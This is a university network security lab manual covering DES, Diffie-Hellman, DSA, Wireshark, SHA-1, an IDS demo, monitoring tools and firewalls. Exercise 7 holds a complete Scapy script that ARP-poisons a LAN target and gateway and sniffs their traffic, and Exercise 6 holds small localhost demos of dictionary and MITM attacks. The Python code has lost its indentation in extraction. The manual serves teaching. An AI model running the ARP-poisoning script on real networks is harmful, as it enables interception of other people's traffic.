COURSE

COURSE TITLE L T P C
CODE

CCS354 NETWORK SECURITY 2 0 2 3

ACADEMIC YEAR: 2024-2025 (EVEN)

YEAR /SEMESTER: III/VI
COURSE CATEGORY: Professional Elective Courses
FACULTY NAME: Er.SHAFLA FATHIMA S

LABORATORY MANUAL
DEPARTMENT OF ARTIFICIAL INTELLIGENCE AND DATA SCIENCE

PREPARED BY HOD / AI & DS

FACULTY CHAIRMAN PRINCIPAL

DEPARTMENT OF ARTIFICIAL INTELLIGENCE AND DATASCIENCE

1
 Institution Vision Statement
The College with Cutting-edge Excellence in Learning, Teaching and Research Integrates
Academia, Industry and National Progress.
Institution Mission Statement
To achieve the vision, the institutional Mission envisages dedicated efforts:
M1: To offer Project based learning for all the Subjects beyond the Syllabus.
M2: To create Multidisciplinary and Interdisciplinary Research Environment among the
Students through solving complex Social Technical Problems.
M3: To motivate Faculty Members and Students to undergo MOOC Courses and
Certifications.
M4: To collaborate with Academia and Industry for Intellectual ambience to develop
intellectual environment holistically and improve Human Capabilities.

2
 Vision Of The Department

To attain excellence in educational quality and research & development in the fields of
Artificial Intelligence and Data Science by imparting knowledge in advanced Machine
Learning frameworks and emerging technologies, and upholding professional ethics.

Mission Of The Department

M1: To develop proficient professionals in Artificial Intelligence and Data Science by

using Modern technologies and practical teaching methods, fostering innovation and
problem-solving abilities.
M2: To enhance awareness of Intellectual Property Rights and Cyber Ethics in AI and Data
Science, and support students in their entrepreneurial endeavours.

3
Program Educational Objectives (PEOs)
1. Utilize their proficiencies in the fundamental knowledge of basic sciences,
mathematics, Artificial Intelligence, data science and statistics to build systems that
require management and analysis of large volumes of data.
2. Advance their technical skills to pursue pioneering research in the field of AI and
Data Science and create disruptive and sustainable solutions for the welfare of
ecosystems.
3. Think logically, pursue lifelong learning and collaborate with an ethical attitude in a
multidisciplinary team.
4. Design and model AI based solutions to critical problem domains in the real world.
5. Exhibit innovative thoughts and creative ideas for effective contribution towards
economy building.
Program Outcomes (POs)
1. Engineering knowledge: Apply the knowledge of mathematics, science,
engineering fundamentals, and an engineering specialization to the solution of
complex engineering problems.
2. Problem analysis: Identify, formulate, review research literature, and analyze
complex engineering problems reaching substantiated conclusions using first
principles of mathematics, natural sciences, and engineering sciences.
3. Design/development of solutions: Design solutions for complex engineering
problems and design system components or processes that meet the specified needs
with appropriate consideration for the public health and safety, and the cultural,
societal, and environmental considerations.
4. Conduct investigations of complex problems: Use research-based knowledge and
research methods including design of experiments, analysis and interpretation of
data, and synthesis of the information to provide valid conclusions.
5. Modern tool usage: Create, select, and apply appropriate techniques, resources,
and modern engineering and IT tools including prediction and modeling to complex
engineering activities with an understanding of the limitations.
6. The engineer and society: Apply reasoning informed by the contextual knowledge
to assess societal, health, safety, legal and cultural issues and the consequent
responsibilities relevant to the professional engineering practice.
7. Environment and sustainability: Understand the impact of the professional
engineering solutions in societal and environmental contexts, and demonstrate the
knowledge of, and need for sustainable development.
8. Ethics: Apply ethical principles and commit to professional ethics and
responsibilities and norms of the engineering practice.
9. Individual and team work: Function effectively as an individual, and as a member or
leader in diverse teams, and in multidisciplinary settings.
10. Communication: Communicate effectively on complex engineering activities with
the engineering community and with society at large, such as, being able to

4
 comprehend and write effective reports and design documentation, make effective
presentations, and give and receive clear instructions.
11. Project management and finance: Demonstrate knowledge and understanding of
the engineering and management principles and apply these to one’s own work, as a
member and leader in a team, to manage projects and in multidisciplinary
environments.
12. Life-long learning: Recognize the need for, and have the preparation and ability to
engage in independent and life-long learning in the broadest context of
technological change.
Program Specific Outcomes (PSOs)
1. Evolve AI based efficient domain specific processes for effective decision making in
several domains such as business and governance domains.
2. Arrive at actionable Foresight, Insight, hindsight from data for solving business and
engineering problems
3. Create, select and apply the theoretical knowledge of AI and Data Analytics along
with practical industrial tools and techniques to manage and solve wicked societal
problems.

CO’s - PO’s & PSO’s MAPPING:

5
 LIST OF EXPERIMENTS

Ex. No. Name of the Experiment Pg. No

1
Implementing symmetric key algorithms –DES

2
Implementing Key exchange algorithms

3.
Implement the SIGNATURE SCHEME – Digital
Signature Standard.
4.
Installation of Wire shark, tcpdump and observe
data transferred in client-servercommunication
using UDP/TCP and identify the UDP/TCP
datagram.
5.
Check message integrity and confidentiality using SSL

6.
Experiment Eavesdropping, Dictionary attacks, MITM
attacks
7
Experiment with Sniff Traffic using ARP Poisoning

8
Demonstrate intrusion detection system using any tool.

9
Explore network monitoring tools

10
Study to configure Firewall, VPN

6
DATE:

EX.NO:1 Data Encryption Standard (DES) Algorithm (User Message Encryption)

AIM:
To use Data Encryption Standard (DES) Algorithm for a practical application
like User Message Encryption.

ALGORITHM:
1. Create a DES Key.
2. Create a Cipher instance from Cipher class, specify the following
information and separated by a slash (/).
a. Algorithm name
b. Mode (optional)
c. Padding scheme (optional)
3. Convert String into Byte[] array format.
4. Make Cipher in encrypt mode, and encrypt it with Cipher.doFinal() method.
5. Make Cipher in decrypt mode, and decrypt it with Cipher.doFinal() method.

PROGRAM:

pip install pycryptodome

from Crypto.Cipher import DES

from Crypto.Random import
get_random_bytes

# Generate a random key

key = get_random_bytes(8) # DES
key must be 8 bytes
cipher = DES.new(key,
DES.MODE_ECB)

# Padding function to ensure data is

aligned to the block size
def pad(text):
while len(text) % 8 != 0:
text += b' ' # Padding with
spaces
return text

# Encrypt a message
plaintext = b'Secret Information'
padded_plaintext = pad(plaintext)
ciphertext =
cipher.encrypt(padded_plaintext)
print(f'Encrypted: {ciphertext}')

7
 # Decrypt the message
cipher_dec = DES.new(key,
DES.MODE_ECB)
decrypted_padded =
cipher_dec.decrypt(ciphertext)
decrypted =
decrypted_padded.rstrip(b' ') #
Removing the padding
print(f'Decrypted: {decrypted.decode()}')

OUTPUT:

Encrypted: b'/p\x04\x07@\xd0\x9a\xf0\x8e\xe5[i\xc9q>F\xdf\x8d)/\xff\xefS\xfa'

Decrypted: Secret Information

RESULT:
Thus the Python program for DES Algorithm has been implemented and the output
verified successfully.

8
DATE:

EX.NO:2 Diffie-Hellman key exchange algorithm

AIM:
To implement the Diffie-Hellman Key Exchange algorithm for a given problem .

ALGORITHM:

Step 1: Alice and Bob publicly agree to use a modulus p = 23 and base g = 5
(which is a primitive root modulo 23).
Step 2: Alice chooses a secret integer a = 4, then sends Bob A = ga mod p
a. A = 54 mod 23 = 4
Step 3: Bob chooses a secret integer b = 3, then sends Alice B = gb mod p
a. B = 53 mod 23 = 10
Step 4: Alice computes s = Ba mod p
a. s = 104 mod 23 = 18
Step 5: Bob computes s = Ab mod p
a. s = 43 mod 23 = 18
Step 6: Alice and Bob now share a secret (the number 18).

PROGRAM:

# Publicly agreed parameters

p = 23 # Prime modulus
g = 5 # Base (primitive root modulo p)

# Alice's secret integer

a=4
A = pow(g, a, p) # A = g^a mod p
print(f"Alice's public value A: {A}")

# Bob's secret integer

b=3
B = pow(g, b, p) # B = g^b mod p
print(f"Bob's public value B: {B}")

# Alice computes the shared secret

shared_secret_A = pow(B, a, p) # s = B^a mod p
print(f"Alice's shared secret: {shared_secret_A}")

# Bob computes the shared secret

shared_secret_B = pow(A, b, p) # s = A^b mod p
print(f"Bob's shared secret: {shared_secret_B}")

# Verify that both shared secrets are the same

assert shared_secret_A == shared_secret_B

9
 print("Diffie-Hellman Key Exchange Successful")

OUTPUT:

Alice's public value A: 4

Bob's public value B: 10
Alice's shared secret: 18
Bob's shared secret: 18
Diffie-Hellman Key Exchange Successful

RESULT:
Thus the Diffie-Hellman key exchange algorithm has been implemented using Python
Program and the output has been verified successfully.

10
DATE:

EX.NO:3 Digital Signature Standard

AIM:
To implement the SIGNATURE SCHEME - Digital Signature Standard.
ALGORITHM:
1. Create a KeyPairGenerator object.
2. Initialize the KeyPairGenerator object.
3. Generate the KeyPairGenerator. ...
4. Get the private key from the pair.
5. Create a signature object.
6. Initialize the Signature object.
7. Add data to the Signature object
8. Calculate the Signature

PROGRAM:
from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import utils

# Generate DSA key pair

private_key = dsa.generate_private_key(key_size=2048)
public_key = private_key.public_key()

# Message to sign
message = b'This is a message for digital signature'

# Sign the message

signature = private_key.sign(
message,

11
 hashes.SHA256()
)

print(f'Digital signature for given text: {signature}')

# Verify the signature

public_key.verify(
signature,
message,
hashes.SHA256()
)
print("Signature verified successfully.")

OUTPUT:
Digital signature for given text: b'0E\x02 \x1e\xce\x13\xdb\t\x94]AW]\xbcl\xa6\x11\xfd\x8e\
xd4jv.\x9c{\xcc,\xd3d\x04\xbfdT\xee\xac\x02!\x00\x83\xcb\xa7\xbfaW\xbbrU\x9ao\xf3<\
xe1\xcd\xda\x1b\x13`\xe3\xcbGg\x01\xbe\xddJ\xb5\xfby\x8d\x9b'
Signature verified successfully.

RESULT:
Thus the Digital Signature Standard Signature Scheme has been implemented and the output
has been verified successfully.

12
DATE:

EX.NO:4 Installation of Wire shark, tcpdump and observe data transferred in

client- server commumication using UDP/TCP and identify the
UDP/TCP datagram

AIM:
To perform the installation of Wire shark, tcpdump and observe data transferred in
client-server communication using UDP/TCP and identify the UDP/TCP datagram.

Introduction:

The first part of the lab introduces packet sniffer, Wireshark. Wireshark is a free
open- source network protocol analyzer. It is used for network troubleshooting and
communication protocol analysis. Wireshark captures network packets in real time
and display them in human-readable format. It provides many advanced features
including live capture and offline analysis, three-pane packet browser, coloring rules
for analysis. This document uses Wireshark for the experiments, and it covers
Wireshark installation, packet capturing, and protocol analysis.

Figure 1: Wireshark in Kali Linux

13
Background
TCP/IP Network Stack

Figure 2: Encapsulation of Data in the TCP/IP Network

Stack
In the CSC 4190 Introduction to Computer Networking (one of the perquisite courses),
TCP/IP network stack is introduced and studied. This background section briefly explains
the concept of TCP/IP network stack to help you better understand the experiments. TCP/IP
is the most commonly used network model for Internet services. Because its most important
protocols, the Transmission Control Protocol (TCP) and the Internet Protocol (IP) were the
first networking protocols defined in this standard, it is named as TCP/IP. However, it
contains multiple layers including application layer, transport layer, network layer, and data
link layer.

- Application Layer: The application layer includes the protocols used by most applications
for providing user services. Examples of application layer protocols are Hypertext

Packet Sniffer

14
Packet sniffer is a basic tool for observing network packet exchanges in a computer. As
the name suggests, a packet sniffer captures (“sniffs”) packets being sent/received
from/by your computer.

The second component of a packet sniffer is the packet analyzer, which displays the
contents of all fields within a protocol message. In order to do so, the packet

analyzer

Packet Sniffer Structure

For example, suppose we are interested in displaying the various fields in messages
exchanged by the HTTP protocol in Figure 3. The packet analyzer understands the
format of Ethernet frames, and so can identify the IP datagram within an Ethernet frame.
It also understands the IP datagram format, so that it can extract the TCP segment within
the IP datagram. Finally, it understands the TCP segment structure, so it can extract the
HTTP message contained in the TCP segment. Finally, it understands the HTTP
protocol and so, for example, knows that the first bytes of an HTTP message will
contain the string “GET,” “POST,” or “HEAD”.

We will be using the Wireshark packet sniffer [http://www.wireshark.org/] for these

labs, allowing us to display the contents of messages being sent/received from/by
protocols at different levels of the protocol stack. (Technically speaking, Wireshark is a
packet analyzer that uses a packet capture library in your computer). Wireshark is a free
network protocol analyzer that runs on Windows, Linux/Unix, and Mac computers.

Getting Wireshark

15
The Kai Linux has Wireshark installed. You can just launch the Kali Linux VM
and open Wireshark there.Wireshark can also be downloaded from here:

https://www.wireshark.org/download.html

16
 lOMoARcPSD|24630861

Starting Wireshark:
When you run the Wireshark program, the Wireshark graphic user interface will be shown
as
Figure 5.Currently, the program is not capturing the packets.

Capture Interfaces in Wireshark

Capturing Packets in Wireshark

17
 lOMoARcPSD|24630861

(Wireshark Graphical User Interface on Microsoft Windows)

The Wireshark interface has five major components:

The command menus are standard pulldown menus located at the top of the window. Of
interest to us now is the File and Capture menus. The File menu allows you to save
captured packet data or open a file containing previously captured packet data, and exit

18
 lOMoARcPSD|24630861

the Wireshark application. The Capture menu allows you to begin packet capture.
The packet-listing window displays a one-line summary for each packet captured,
including the packet number (assigned by Wireshark; this is not a packet number
contained in any protocol’s header), the time at which the packet was captured, the
packet’s source and destination addresses, the protocol type, and protocol-specific
information contained in the packet. The packet listing can be sorted according to any of
these categories by clicking on a column name. The protocol type field lists the highest-
level protocol that sent or received this packet, i.e., the protocol that is the source or
ultimate sink for this packet.

The packet-header details window provides details about the packet selected
(highlighted) in the packet-listing window. (To select a packet in the packet-listing
window, place the cursor over the packet’s one- line summary in the packet-listing
window and click with the left mouse button.). The packet-contents window displays
the entire contents of the captured frame, in both ASCII and hexadecimal format.

Towards the top of the Wireshark graphical user interface, is the packet display filter
field, into which a protocol name or other information can be entered in order to filter
the information displayed in the packet-listing window (and hence the packet-header
and packet-contents windows). In the examplebelow, we’ll use the packet-display
filter field to have Wireshark hide (not display) packets except those that correspond to
HTTP messages.

Capturing Packets
After downloading and installing Wireshark, you can launch it and click the name of
an interface under Interface List to start capturing packets on that interface. For
example, if you want to capture traffic on the wireless network, click your wireless
interface.

Test Run
Do the following steps:

1. Start up the Wireshark program (select an interface and press start to

capture packets).
2. Start up your favorite browser (ceweasel in Kali Linux).
3. In your browser, go to Wayne State homepage by typing www.wayne.edu.
4. After your browser has displayed the http://www.wayne.edu page, stop

19
 lOMoARcPSD|24630861

Wireshark packet
capture by selecting stop in the Wireshark capture window.
This will cause the Wireshark capture window to disappear
and the main Wireshark window to display all packets
captured since you began packet capture see image below:

5. Color Coding: You’ll probably see packets highlighted in green, blue, and
black. Wireshark uses colors to help you identify the types of traffic at a
glance. By default, green is TCP traffic, dark blue is DNS traffic, light blue is UDP

20
 lOMoARcPSD|24630861

traffic, and black identifies TCP packets with problems — for example, they could
have been delivered out-of-order.
6. You now have live packet data that contains all protocol messages exchanged
between your computer and other network entities! However, as you
will notice the HTTP
7. messages are not clearly shown because there are many other packets included
in the packet capture. Even though the only action you took was to open your
browser, there are many other programs in your computer that communicate
via the network in the background. To filter the connections to the ones we
want to focus on, we have to use the filtering functionality of Wireshark by
typing “http” in the filtering field as shown below:
8. Notice that we now view only the packets that are of protocol HTTP.
However, we also still do not have the exact communication we want to focus
on because using HTTP as a filter is not descriptive enough to allow us to find
our connection to http://www.wayne.edu. We need to be more precise if we
want to capture the correct set of packets.
9. To further filter packets in Wireshark, we need to use a more precise
filter. By setting the
http.host www.wayne.edu,
we are restricting the view to packets that have as an http host the
www.wayne.edu website. Notice that we need two equal signs to perform
the match not just one. See the screenshot below:

21
 lOMoARcPSD|24630861

10. Now, we can try another protocol. Let’s use Domain Name

System (DNS) protocol as an example here.

Let’s try now to find out what are those packets contain by following conversations (also
called network flows), select one of the packets and press the right mouse button (if you
are on a Mac use the command button and click), you should see something similar to the
screen below:

Click on Follow UDP Stream, and then you will see

following screen.

22
 lOMoARcPSD|24630861

1. If we close this window and change the filter back to “http.hos ww.wayne.edu”
and then follow a packetfrom the list of packets that match that filter, we should
get the something similar to the following screens. Note that we click on Follow
TCP Stream this time.

23
 lOMoARcPSD|24630861

RESULT:

Thus, the installation of Wire shark, tcpdump is performed and data transferred is
observed in client-server communication using UDP/TCP and the UDP/TCP
datagram is identified.

24
 lOMoARcPSD|24630861

DATE:

EX.NO:5 Check message integrity and confidentiality using SSL Date:

AIM:
To Calculate the message digest of a text using the SHA-1 algorithm.
ALGORITHM:
1. Append Padding Bits
2. Append Length - 64 bits are appended to the end
3. Prepare Processing Functions
4. Prepare Processing Constants
5. Initialize Buffers
6. Processing Message in 512-bit blocks (L blocks in total message)

PROGRAM:
import hashlib

def sha1_hash(input_data):
sha1 = hashlib.sha1()
sha1.update(input_data.encode())
return sha1.hexdigest()

# Test inputs
inputs = ["", "abc", "abcdefghijklmnopqrstuvwxyz"]

# Print SHA-1 hashes

for input_data in inputs:
print(f'SHA1("{input_data}") = {sha1_hash(input_data)}')

OUTPUT:

25
 lOMoARcPSD|24630861

SHA1("") = da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA1("abc") = a9993e364706816aba3e25717850c26c9cd0d89d
SHA1("abcdefghijklmnopqrstuvwxyz") = 32d10c7b8cf96570ca04ce37f2a19d84240d3a89

RESULT:
Thus the Secure Hash Algorithm (SHA-1) has been implemented and the output has been
verified successfully.

26
 lOMoARcPSD|24630861

DATE:

EX.NO:6 Experiment Eavesdropping, Dictionary attacks, MITM attacks

AIM:

To experiment eavesdropping, Dictionary attacks, MIMT attacks

ALGORITHM:
Eavesdropping:
Step 1: Set Up the Server
 Create a socket for the server.
 Bind the server socket to a specific address and port (localhost, 8080).
 Listen for incoming connections and accept a connection.
 Receive data from the client, print the received message, and send the data back to the
client.
 Close the connection.
Step 2: Set Up the Client
 Create a socket for the client.
 Connect the client socket to the server's address and port (localhost, 8080).
 Send a message from the client to the server.
 Print the sent message.
 Receive the echoed message from the server and print it.
 Close the connection.
Step 3: Execute Server and Client in Separate Threads
 Create and start a thread for the server function.
 Create and start a thread for the client function.
 Wait for both threads to complete execution.

Dictionary attack:

27
 lOMoARcPSD|24630861

Step 1: Import the Required Library

 Import the hashlib library for hashing.
Step 2: Define the Dictionary of Potential Passwords
 Create a list called dictionary containing potential passwords.
Step 3: Define the Hashed Password to be Cracked
 Hash the known password ("password1") using SHA-256 and store the hashed value
in hashed_password.
Step 4: Perform the Dictionary Attack
 Loop through each word in the dictionary:
o Hash the current word using SHA-256.
o Compare the hashed value of the current word with the hashed value of the
known password (hashed_password).
o If they match, print the word and break out of the loop.

Man-in-the-Middle (MITM) Attack:

Step 1: Set Up the MITM Server
 Create a socket for the MITM server.
 Bind the server socket to localhost on port 8080.
 Listen for incoming connections.
 Accept a connection and receive data from the client.
 Modify the received data and print it.
 Send the modified data back to the client.
 Close the connection.
Step 2: Set Up the Client
 Create a socket for the client.
 Connect the client socket to the MITM server's address and port (localhost, 8080).
 Send a message from the client to the server.
 Print the sent message.
 Receive the modified message from the server and print it.
 Close the connection.
Step 3: Execute MITM Server and Client in Separate Threads

28
 lOMoARcPSD|24630861

 Create and start a thread for the MITM server function.

 Create and start a thread for the client function.

PROGRAM:
Eavesdropping:

import socket, threading

# Server function
def server():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 8080))
s.listen(1)
conn, _ = s.accept()
data = conn.recv(1024).decode()
print(f"Server received: {data}")
conn.send(data.encode())
conn.close()

# Client function
def client():
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(('localhost', 8080))
msg = "Hello, Server!"
c.send(msg.encode())
print(f"Client sent: {msg}")
print(f"Client received: {c.recv(1024).decode()}")
c.close()

# Start server and client

threading.Thread(target=server).start()
threading.Thread(target=client).start()

OUTPUT:
Client sent: Hello, Server!
Server received: Hello, Server!
Client received: Hello, Server!

Dictionary attack:

29
 lOMoARcPSD|24630861

import hashlib

# Dictionary of potential passwords

dictionary = ["password", "123456", "admin", "letmein", "password1"]

# Hashed password to be cracked

hashed_password = hashlib.sha256("password1".encode()).hexdigest()

# Perform dictionary attack

for word in dictionary:
if hashlib.sha256(word.encode()).hexdigest() == hashed_password:
print(f"Password found: {word}")
break

OUTPUT:
Password found: password1

Man-in-the-Middle (MITM) Attack:

import socket, threading

# MITM server function

def mitm_server():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 8080))
s.listen(1)
conn, _ = s.accept()
data = conn.recv(1024).decode()
modified_data = data.replace("Hello", "Intercepted")
print(f"MITM modified: {modified_data}")
conn.send(modified_data.encode())
conn.close()

# MITM client function

def mitm_client():
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(('localhost', 8080))
msg = "Hello, Server!"
c.send(msg.encode())
print(f"Client sent: {msg}")
print(f"Client received: {c.recv(1024).decode()}")
c.close()

# Start the MITM server and client

threading.Thread(target=mitm_server).start()
threading.Thread(target=mitm_client).start()

OUTPUT:
Client sent: Hello, Server!

30
 lOMoARcPSD|24630861

MITM modified: Intercepted, Server!

Client received: Intercepted, Server!

RESULT :
Thus the programs for Eavesdropping, Dictionary attacks, MITM attacks were implemented
successfully.

31
 lOMoARcPSD|24630861

DATE:

EX.NO:7 Perform an Experiment to Sniff Traffic using ARP Poisoning

AIM:
Perform an Experiment to Sniff Traffic using ARP Poisoning.
Description:

ARP is the acronym for Address Resolution Protocol. It is used to convert IP address to
physical addresses [MAC address] on a switch. The host sends an ARP broadcast on the
network, and the recipient computer responds with its physical address [MAC Address]. The
resolved IP/MACaddress is then used to communicate. ARP poisoning is sending fake MAC
addresses to the switch so that it can associate the fake MAC addresses with the IP address of
a genuine computer on a network and hijack the traffic.
Scapy is a powerful Python library used for network packet manipulation, including creating,
sending, and sniffing network packets. Here’s a complete example using Scapy to perform
ARP poisoning and sniff traffic.

ALGORITHIM:

Step 1: Install scapy

 Ensure the scapy library is installed on your system.

Step 2: Import Necessary Libraries

 Import ARP, send, sniff from scapy.all.

 Import signal and sys.

Step 3: Define Function poison to Perform ARP Poisoning

 Create the poison function to send spoofed ARP responses to both the target and
gateway.

Step 4: Define Function restore to Restore ARP Tables

 Create the restore function to send correct ARP responses and restore the ARP tables
to their original state.

Step 5: Define Function sniff_packets to Sniff Packets

32
 lOMoARcPSD|24630861

 Create the sniff_packets function to print the summary of each captured packet.

Step 6: Define signal_handler to Restore Network on Script Interruption

 Create the signal_handler function to restore the ARP tables and exit the script
gracefully when interrupted.

Step 7: Register the Signal Handler

 Use signal.signal to register the signal_handler function to handle the interrupt signal
(SIGINT).

Step 8: Initialize Example IPs and MAC Addresses

 Define example IPs and MAC addresses for the target and gateway (replace with
actual values from your network).

Step 9: Start ARP Poisoning and Sniff Packets

 In a try block, start ARP poisoning using the poison function and sniff packets using
the sniff_packets function in a loop.

 Ensure the signal_handler restores the network when the script is interrupted.

PROGRAM:

pip install scapy

from scapy.all import ARP, send, sniff

import signal
import sys

# Function to perform ARP poisoning

def poison(target_ip, gateway_ip, target_mac, gateway_mac):
send(ARP(op=2, pdst=target_ip, psrc=gateway_ip, hwdst=target_mac), verbose=False)
send(ARP(op=2, pdst=gateway_ip, psrc=target_ip, hwdst=gateway_mac), verbose=False)

# Function to restore ARP tables

def restore(target_ip, gateway_ip, target_mac, gateway_mac):
send(ARP(op=2, pdst=target_ip, psrc=gateway_ip, hwsrc=gateway_mac,
hwdst=target_mac), count=3, verbose=False)
send(ARP(op=2, pdst=gateway_ip, psrc=target_ip, hwsrc=target_mac,
hwdst=gateway_mac), count=3, verbose=False)

33
 lOMoARcPSD|24630861

# Function to sniff packets

def sniff_packets(packet):
print(f"Packet: {packet.summary()}")

# Signal handler to restore network on script interruption

def signal_handler(sig, frame):
print("Stopping ARP poisoning. Restoring network...")
restore(target_ip, gateway_ip, target_mac, gateway_mac)
print("Network restored.")
sys.exit(0)

# Example IPs and MAC addresses (use real values from your network)
target_ip = "192.168.1.2"
gateway_ip = "192.168.1.1"
target_mac = "00:00:00:00:00:02" # Replace with actual MAC address
gateway_mac = "00:00:00:00:00:01" # Replace with actual MAC address

# Register the signal handler

signal.signal(signal.SIGINT, signal_handler)

try:
print("Starting ARP poisoning... Press Ctrl+C to stop.")
while True:
poison(target_ip, gateway_ip, target_mac, gateway_mac)
sniff(filter="ip", prn=sniff_packets, count=10) # Sniff packets
except KeyboardInterrupt:
pass # This block is now handled by signal_handler

OUTPUT:

WARNING: You should be providing the Ethernet destination MAC address when sending
an is-at ARP.
Starting ARP poisoning... Press Ctrl+C to stop.
WARNING: MAC address to reach destination not found. Using broadcast.
WARNING: You should be providing the Ethernet destination MAC address when sending
an is-at ARP.
Packet: Ether / IP / TCP 192.168.1.36:55471 > 192.168.1.25:8009 PA / Raw
Packet: Ether / IP / TCP 192.168.1.36:55472 > 192.168.1.25:8009 PA / Raw …….
…….
…….
After stopping the script:
Stopping ARP poisoning. Restoring network...

RESULT:
Thus the experiment to Sniff Traffic using ARP Poisoning was performed.

34
 lOMoARcPSD|24630861

DATE:

EX.NO:8 Demonstration of Intrusion Detection System(IDS) using any tool

AIM:
To demonstrate Intrusion Detection System(IDS) using Pandas, a Python library for data
manipulation and analysis.
ALGORITHM:
Step 1: Load the Data
 Create a synthetic dataset with features and labels indicating whether the network
traffic is normal or an attack.
 Load the dataset into a DataFrame using Pandas.
Step 2: Define the Detection Rule
 Create a function rule_based_detection that takes a row of the DataFrame and returns
'Attack' if specific conditions are met (e.g., Feature1 == 1 and Feature2 == 2),
otherwise 'Normal'.
Step 3: Apply the Rule to Detect Intrusions
 Use the apply method in Pandas to apply the rule_based_detection function to each
row of the DataFrame and create a new column for detected labels (Detected).
Step 4: Evaluate the Detection
 Use a confusion matrix to compare the detected labels (Detected) with the actual
labels (Label). The pd.crosstab function in Pandas helps generate this matrix for
evaluation.

PROGRAM:
import pandas as pd

# Sample synthetic dataset

data = {
'Feature1': [1, 2, 1, 2, 1, 2, 1, 2, 1, 2],
'Feature2': [1, 1, 2, 2, 1, 1, 2, 2, 1, 1],
'Label': ['Normal', 'Normal', 'Attack', 'Attack', 'Normal', 'Normal', 'Attack', 'Attack',
'Normal', 'Normal']
}

35
 lOMoARcPSD|24630861

# Create a DataFrame
df = pd.DataFrame(data)

# Rule-based function to detect intrusion

df['Detected'] = df.apply(lambda row: 'Attack' if row['Feature1'] == 1 and row['Feature2'] ==
2 else 'Normal', axis=1)

# Evaluate the rule-based detection

print(pd.crosstab(df['Label'], df['Detected'], rownames=['Actual'], colnames=['Predicted']))

OUTPUT:
Predicted Attack Normal
Actual
Attack 2 2
Normal 0 6

RESULT:
Thus the program to demonstrate Intrusion Detection System(IDS) using Pandas, a

Python library for data manipulation and analysis is implemented successfully

36
 lOMoARcPSD|24630861

DATE:

EX.NO:9 Explore network monitoring tools

AIM :
To explore about Network monitoring tools\

NETWORK MONITORING:
Network monitoring is an essential part of network management. It involves using various
tools to monitor a system network and determine slowness and weak connections, among
other issues. Knowing more about these tools can help you understand them better and use
the right ones that suit your requirements.
What Are Network Monitoring Tools?
Network monitoring tools are software that you can use to evaluate network connections.
These software programs can help you monitor a network connection and identify network
issues, which may include failing network components, slow connection speed, network
outage or unidentifiable connections.
Network Monitoring Tools
Here are eight monitoring tools along with their descriptions and features:
1. SolarWinds Network Performance Monitor
SolarWinds Network Performance Monitor is a multi-vendor monitoring tool. It allows users
to monitor multiple vendors' networks at the same time. It also provides network insights for
thorough visibility into the health of the networks.
2. Auvik
Auvik is a network monitoring and management tool. It offers a quick implementation
process that helps users to set up the tool easily. It also has a clean user interface that makes it
easy to navigate and use. The tool provides in-depth network visibility that enables faster
troubleshooting for network issues. Users can automate network visibility using Auvik. It
provides real-time updates on network issues and configuration changes.

3. Datadog Network Monitoring

37
 lOMoARcPSD|24630861

Datadog Network Monitoring offers services for on-premises devices and cloud networks. A
highlighting feature of this tool is the visualisations. It offers various graphical
representations of all
4. Paessler PRTG Network Monitor
Paessler's network connection monitoring tool provides a clean user interface and network
visibility on multiple devices. Users can track the health of different connection types like
local area networks (LAN), wide area network (WAN), servers, websites, applications and
services.
5. ManageEngine OpManager
ManageEngine OpManager is a good network monitoring and managing tool for users that
prefer in- depth view of network health and issues. This tool provides over 2000 network
performance monitors that allow users to track and monitor their connections and perform
detailed analyses on issues.
6. Domotz
Domotz is an expansive tool that provides a list of features for monitoring network
connections. It allows users to customise their network monitoring preferences. Users can
write scripts the retrieve the data they wish to evaluate. It also allows connection to open
ports on remote devices while ensuring network security. Users can also scan and monitor
network connections globally. Domotz also allows to backup and restore network
configuration for switches, firewalls and access points and alerts when there is a change in
the configuration.
7. Checkmk
Checkmk is a tool that allows users to automate it completely. You can customise its
operations and enable it to perform tasks automatically. It also identifies network and security
components without the user requiring manual set up. For example, the tool can identify a
firewall even if the user has not set it up. Its Agent Bakery feature enables users to manage
agents and automate agent updating. This reduces manual effort to monitor network
connections. The tool also includes over 2000 plug-ins for enhancing network monitoring.
8. Progress Whatsup Gold
Progress Whatsup Gold is a basic network monitoring software. It provides a minimal user
interface with essential features like device monitoring, application monitoring, analysing
network traffic and managing configurations. The tool allows users to monitor cloud devices,
inspect suspicious connections, automate configuration backups and identify, and resolve
bandwidth issues.

Other Tools For Network Monitoring

Here are three additional tools for network monitoring:

38
 lOMoARcPSD|24630861

• Fortra Intermapper: This tool enables users to monitor network connections using
network maps, allowing them to get a holistic view of all the connections. It also provides
various colour codes for different network status, along with real-time notifications through
text, email and sound.
• Nagios Core: Nagios Core is a monitoring engine that works as the primary
application for all
• Nagios projects, including the Nagios Network Analyser.
• Zabbix: Zabbix provides a thorough network monitoring solution with features like
server monitoring, cloud monitoring, application monitoring and service monitoring. The tool
also includes features like metric collection, business monitoring and root cause analyses of
network issues, and allows users to establish a threshold for connection anomalies.

Tips To Choose A Network Monitoring And Management Tool

Here are some useful tips that you can consider while selecting a tool for network
monitoring:

Understand the requirements

Understanding why you require network monitoring software is important in the process.
Define what feature you want and for what purpose. This can help you identify the right tool
for your use. It may also help you choose the correct subscription plan on paid tools.
Browse multiple tools
Once you identify the requirements, consider browsing multiple tools. Visit the websites of
the tools and look for the features you require. Spend time studying the features and
understand how they can be useful to your requirements. You can also identify a few tools
and compare their features to each other.
Consider the budget
Some tools may be free to use, while some may require you to purchase a subscription plan.
Paid tools typically offer a free trial period of up to 30 days. Once you identify which tool
you may like to use, see if it is free or requires payment. If it is a paid tool, try exploring its
features and efficiency during the trial period. Consider keeping a backup tool in case the tool
that you choose does not fit your usage.

RESULT:
Thus the network monitoring tools was explored.

39
 lOMoARcPSD|24630861

40
 lOMoARcPSD|24630861

DATE:
EX.NO:10 Study to configure Firewall, VPN

AIM:

To study the features of firewall in providing network security and to set Firewall
Security in windows.

Firewall in Windows 7

Windows 7 comes with two firewalls that work together. One is the Windows Firewall,
and the other is Windows Firewall with Advanced Security (WFAS). The main difference
between them is the complexity ofthe rules configuration. Windows Firewall uses simple
rules that directlyrelate to a program or a service. The rules in WFAS can be configured
